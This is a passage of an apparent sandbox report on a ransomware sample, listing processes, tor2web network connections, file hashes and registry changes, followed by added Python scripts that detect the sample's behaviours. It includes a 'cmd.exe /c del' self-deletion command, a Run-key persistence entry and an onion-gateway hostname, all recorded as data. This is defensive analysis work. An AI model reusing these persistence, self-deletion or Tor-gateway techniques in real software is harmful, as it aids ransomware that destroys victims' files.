C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3904 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffab87c3cb8,0x7ffab87c3cc8,0x7ffab87c3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,10699202771409224673,4997843485074418560,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
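The process listing above carries three behaviours worth turning into detection logic: the sample launches a copy of itself from %AppData%\Roaming under a random name, it removes the original with "cmd.exe /c del" using the 8.3 short name (3372C1~1.EXE is derived from the first six characters of the long file name), and it opens the ransom note in the default browser with --single-argument. The Python below is an added example, not part of the sandbox report or of any tooling the report's vendor provides; it runs the three rules over the image-path/command-line pairs copied from the listing, and the regular expressions, rule names and the assumption that the first row is the submitted sample are the author's own.

```python
import ntpath
import re

# Constructed sample input: image-path / command-line pairs from the
# behavioral2 listing above, reduced to the rows each rule needs.
PROCESS_LOG = r"""
C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe
"C:\Users\Admin\AppData\Local\Temp\3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370.exe"
C:\Users\Admin\AppData\Roaming\ysljjud.exe
C:\Users\Admin\AppData\Roaming\ysljjud.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3372C1~1.EXE >> NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\log.html
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
"""

# Directories an unprivileged user can write to; executables launched from
# here deserve a closer look regardless of signer (assumed, not from the page).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(Roaming|Local\\Temp)\\", re.I)
# "cmd.exe /c del [/switches] <target>": the classic self-removal one-liner.
DEL_RE = re.compile(r'cmd\.exe"?\s+/c\s+del\s+(?:/\S+\s+)*(?P<target>[^\s>]+)', re.I)
# A browser handed a local HTML file as its only argument.
NOTE_RE = re.compile(r"--single-argument\s+(?P<note>\S+\.html?)\b", re.I)


def parse_processes(text):
    """Pair each image path with the command line on the following line."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    return [(lines[i], lines[i + 1]) for i in range(0, len(lines) - 1, 2)]


def short_name_matches(short, long_name):
    """Heuristic 8.3 match: Windows builds the short name from the first six
    characters of the long name plus '~N' (hash-based names generated after
    several collisions are not handled). NTFS stores short names upper-case."""
    if "~" not in short:
        return False
    stem = short.split("~", 1)[0]
    return long_name.upper().startswith(stem.upper())


def detect(processes):
    """Return a sorted, de-duplicated list of (rule, evidence) tuples."""
    findings = set()
    sample_image = processes[0][0]          # first row is the submitted sample
    sample = ntpath.basename(sample_image)
    for image, cmdline in processes:
        base = ntpath.basename(image)
        if (image != sample_image and image.lower().endswith(".exe")
                and USER_WRITABLE.search(image)):
            findings.add(("dropped_exe_in_user_dir", base))
        m = DEL_RE.search(cmdline)
        if m and base.lower() == "cmd.exe":
            target = ntpath.basename(m.group("target"))
            if target.lower() == sample.lower() or short_name_matches(target, sample):
                findings.add(("self_delete_of_sample", target))
        m = NOTE_RE.search(cmdline)
        if m and USER_WRITABLE.search(m.group("note")):
            findings.add(("browser_opens_note_from_user_dir",
                          ntpath.basename(m.group("note"))))
    return sorted(findings)


if __name__ == "__main__":
    for rule, evidence in detect(parse_processes(PROCESS_LOG)):
        print(f"{rule:35} {evidence}")
```

The 8.3 comparison is deliberately loose: it only proves that the deleted short name is consistent with the sample's long name, so on a live host confirm the mapping with `dir /x` in the Temp directory before treating the match as certain.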
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.org | udp |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.242.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.197.79.204.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| N/A | 52.111.227.14:443 | N/A | tcp |
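The Network table shows the sample resolving and then connecting to a tor2web.org hostname. Gateways of that kind proxy a Tor hidden service to the clearnet, so the left-most label of the hostname is the .onion address the ransomware actually talks to; the in-addr.arpa names are reverse lookups whose octets are written back to front; and the 224.0.0.251:5353 row is multicast DNS noise from the guest. The Python below is an added example, not part of the sandbox report or its vendor's tooling: it parses rows shaped like the table above, recovers the .onion address and the looked-up IP, and tags each row. The gateway list beyond tor2web.org and the category names are the author's assumptions.

```python
import ipaddress
import re

# Constructed sample input: rows of the Network table above (header included).
NETWORK_TABLE = """
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.tor2web.org | udp |
| AU | 103.198.0.111:443 | 7tno4hib47vlep5o.tor2web.org | tcp |
| GB | 51.140.242.104:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
"""

# Clearnet-to-Tor gateways. tor2web.org is the one on this page; the others
# are assumed, non-exhaustive additions.
TOR_GATEWAYS = ("tor2web.org", "onion.to", "onion.ws", "onion.ly")
# v2 onion labels are 16 base32 characters, v3 labels are 56.
ONION_LABEL = re.compile(r"^(?:[a-z2-7]{16}|[a-z2-7]{56})$")


def parse_rows(text):
    """Turn the pipe table into dicts, skipping the header and malformed rows."""
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        rows.append(dict(zip(("country", "destination", "domain", "proto"), cells)))
    return rows


def onion_from_gateway(hostname):
    """'<label>.tor2web.org' -> '<label>.onion', or None if not a gateway name."""
    host = hostname.lower().rstrip(".")
    for gw in TOR_GATEWAYS:
        if host.endswith("." + gw):
            label = host[: -len(gw) - 1].split(".")[-1]
            if ONION_LABEL.match(label):
                return label + ".onion"
    return None


def ptr_to_ip(name):
    """Decode an IPv4 reverse-lookup name back into the address queried."""
    host = name.lower().rstrip(".")
    suffix = ".in-addr.arpa"
    if not host.endswith(suffix):
        return None
    octets = host[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ValueError:
        return None


def classify(row):
    """Return (category, detail) for one table row. IPv4 destinations only,
    which is all this table contains."""
    ip = ipaddress.ip_address(row["destination"].rsplit(":", 1)[0])
    onion = onion_from_gateway(row["domain"])
    if onion:
        return ("tor_gateway", onion)
    ptr = ptr_to_ip(row["domain"])
    if ptr:
        return ("reverse_dns", ptr)
    if ip.is_multicast:
        return ("multicast", str(ip))
    return ("other", row["domain"])


def summarize(text):
    return [classify(row) for row in parse_rows(text)]


if __name__ == "__main__":
    for category, detail in summarize(NETWORK_TABLE):
        print(f"{category:12} {detail}")
```

Treat the recovered .onion address as the durable indicator: gateway operators and their domains change, and the same service is reachable through any of them.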
Files
C:\Users\Admin\AppData\Roaming\ysljjud.exe
| MD5 | 209a288c68207d57e0ce6e60ebf60729 |
| SHA1 | e654d39cd13414b5151e8cf0d8f5b166dddd45cb |
| SHA256 | 3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370 |
| SHA512 | ce4a7e42738154183fc53702f0841dfd4ad1eb0567b13cc1ff0909f1d330e9cd2fb994375efc6f02e7eddaaae1f465ff93458412143266afdaff1c6bf6477fc3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 7bed1eca5620a49f52232fd55246d09a |
| SHA1 | e429d9d401099a1917a6fb31ab2cf65fcee22030 |
| SHA256 | 49c484f08c5e22ee6bec6d23681b26b0426ee37b54020f823a2908ab7d0d805e |
| SHA512 | afc8f0b5b95d593f863ad32186d1af4ca333710bcfba86416800e79528616e7b15f8813a20c2cfa9d13688c151bf8c85db454a9eb5c956d6e49db84b4b222ee8 |
\??\pipe\LOCAL\crashpad_4688_PASGRGAINHOKCQXV
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5431d6602455a6db6e087223dd47f600 |
| SHA1 | 27255756dfecd4e0afe4f1185e7708a3d07dea6e |
| SHA256 | 7502d9453168c86631fb40ec90567bf80404615d387afc7ec2beb7a075bcc763 |
| SHA512 | 868f6dcf32ef80459f3ea122b0d2c79191193b5885c86934a97bfec7e64250e10c23e4d00f34c6c2387a04a15f3f266af96e571bbe37077fb374d6d30f35b829 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 324d3a5e9b6ca20f0d648da739cac6dd |
| SHA1 | a220328f6c759922b327de62495422cb230112e7 |
| SHA256 | 41bd5a57fb310879724daa61b0ccbb7fbbbf1123f35e67b9a4018c6539b64070 |
| SHA512 | 53d6cc8a22589ddf65a09516541801a2263bba7c5127024e3d12d32ef0f35cfcd3399e238c262c39a44a678dd202343b6942932099d9957c97d0bc606d7cc1ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6a0e555f481402da2ea170967e86dedb |
| SHA1 | 354450cde633e8ced8f2c24ee0a20f8e2c498164 |
| SHA256 | 5afe4da6cb737b8b801808ad1db07b954d7b14a4e6704e9907a368b73ce31586 |
| SHA512 | 85ce75a7474c8139f42381192a2f32d7ca1d5dc3a30a1e4d26a79b5f934048a5f4ec912d0b3b0ba8775453cb198a30d7680643ad1bce8d20c6a8ace69e3d8d2e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1a2e3e0c08197b14173ed434408cac25 |
| SHA1 | 2bcd0fea7ff30a47d90b98d52bc2d88d56033e2d |
| SHA256 | 9d4dee4f2db8e5f1fd656edf4cfe1ff9d924b5c338ef215df661600dd90d4ec6 |
| SHA512 | 9c2dbe33808cf54e0c5c3a231842497d8545ff1925906a524d1101dcce7b6541388d40cbcea4325f7ef01aba2eeea01b3b8d3240af737015eee016bd59bc3ccb |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | d98c17cfbf569ddbced6c9f7d0c6c934 |
| SHA1 | 0894197ca41a71fa1802965cfb6135088a22e878 |
| SHA256 | 0b95871daa7a4f6501ab6898e35344bba32bc54596578ca83b988ed90db12d71 |
| SHA512 | 4a9d307eccd6d9cdfa29c792237e9e399692f44bd2782f95b5d7eb020516dbe92337725bca070f65c905a5ccb9ba2baa29d332cada6e60a55b29ee283a70e6ce |
C:\Users\Admin\AppData\Roaming\log.html
| MD5 | f5b185e17f68b1548785e3eaa701ba2c |
| SHA1 | d9488a71ea2d313e24566ec6124c52d4c30d70dd |
| SHA256 | 9935cb1963a5176d565de059566170d98c3d0d60bbf7f26d0e31e30fea83376e |
| SHA512 | 21657feafe384ce18105dbb896a11fe0aba528f351fbaee98c7ec3b037d739e66bc214f04e15b26dff799baa1231065147d71ba20e4162a0a9c990a061cee99a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 505608fd610f0056ca3303029e539bc5 |
| SHA1 | 77f197f20fb48915b6d512ffd70acf199ca8ca19 |
| SHA256 | a72aba95d99e0d776360dffd6049dddf16b70cdd99cf630549c02b29b374e500 |
| SHA512 | c06e568877aaddfd371a5549284dc9cdd285fe5016e26a64bd94752cdfe482f70af5e8a9411f9cb7741d86f2efab3e87c25946a6f0c93ffeff8c71bd49ed97cc |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win7-20240903-en
Max time kernel
98s
Max time network
96s
Command Line
Signatures
Deletes shadow copies
Renames multiple (374) files with added filename extension
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\msconfig = "C:\\Users\\Admin\\AppData\\Roaming\\qrsjojt.exe" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_RESTORE_FILES.bmp" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
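The registry rows in this run and in behavioral2 record the two impact-side behaviours of the sample: a Run value named "msconfig" that points at the dropped executable in %AppData%\Roaming, and the desktop wallpaper switched to HELP_RESTORE_FILES.bmp by that same executable. The Python below is an added example, not part of the sandbox report or its vendor's tooling. It parses the "Set value (str)" rows as the report prints them (native \REGISTRY\ paths, doubled backslashes inside quoted data), normalises the hive and the Wow6432Node view, and flags Run-key persistence into a user-writable directory and wallpaper changes made by a process running from one. The rule names and the user-writable path pattern are the author's assumptions.

```python
import re

# Constructed sample input: three rows from the tables above, one from the
# behavioral2 run (ysljjud.exe) and two from behavioral4 (qrsjojt.exe).
REGISTRY_ROWS = r"""
| Set value (str) | \REGISTRY\USER\S-1-5-21-4248760313-3670024077-2384670640-1000\Control Panel\Desktop\WallpaperStyle = "0" | C:\Users\Admin\AppData\Roaming\ysljjud.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\msconfig = "C:\\Users\\Admin\\AppData\\Roaming\\qrsjojt.exe" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_RESTORE_FILES.bmp" | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
"""

HIVE_RE = re.compile(r"^\\REGISTRY\\(MACHINE|USER)(?:\\(S-1-5-[\d-]+))?\\(.+)$", re.I)
# Locations an unprivileged user can write to (assumed list, extend as needed).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData\\(Roaming|Local\\Temp)|Desktop)\\", re.I)
WALLPAPER_VALUES = {"wallpaper", "wallpaperstyle", "tilewallpaper"}


def parse_set_value(indicator):
    """Split '<key>\\<name> = "<data>"' into parts, map the native hive name
    to HKLM/HKU and collapse the doubled backslashes inside quoted data."""
    path, _, data = indicator.partition(" = ")
    m = HIVE_RE.match(path)
    if not m:
        return None
    hive, sid, rest = m.groups()
    key, _, name = rest.rpartition("\\")
    return {
        "hive": "HKLM" if hive.upper() == "MACHINE" else "HKU",
        "sid": sid,
        "key": key,
        "name": name,
        "data": data.strip().strip('"').replace("\\\\", "\\"),
    }


def parse_registry_rows(text):
    rows = []
    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 4 and cells[0].startswith("Set value"):
            entry = parse_set_value(cells[1])
            if entry:
                entry["process"] = cells[2]
                rows.append(entry)
    return rows


def detect_registry(text):
    """Return (rule, value name, data) tuples for the rows that match."""
    findings = []
    for e in parse_registry_rows(text):
        # Compare on the 64-bit view so Wow6432Node-redirected writes match.
        key = e["key"].lower().replace("\\wow6432node", "")
        if (key.endswith(("\\currentversion\\run", "\\currentversion\\runonce"))
                and USER_WRITABLE.search(e["data"])):
            findings.append(("run_key_persistence", e["name"], e["data"]))
        if (key.endswith("control panel\\desktop")
                and e["name"].lower() in WALLPAPER_VALUES
                and USER_WRITABLE.search(e["process"])):
            findings.append(("desktop_wallpaper_changed", e["name"], e["data"]))
    return findings


if __name__ == "__main__":
    for rule, name, data in detect_registry(REGISTRY_ROWS):
        print(f"{rule:26} {name:15} {data}")
```

On a live host the same two checks translate to reading HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (and its Wow6432Node twin) and HKU\<SID>\Control Panel\Desktop; the value name "msconfig" is chosen to look like a Windows component, so match on where the data points, not on the name.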
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2948 set thread context of 2340 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 1936 set thread context of 2444 | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | C:\Users\Admin\AppData\Roaming\qrsjojt.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\VideoLAN\VLC\locale\fi\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\zh_TW\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Media Player\ja-JP\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\16to9Squareframe_Buttongraphic.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\mai\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Media Player\en-US\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\es-ES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nn.txt | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
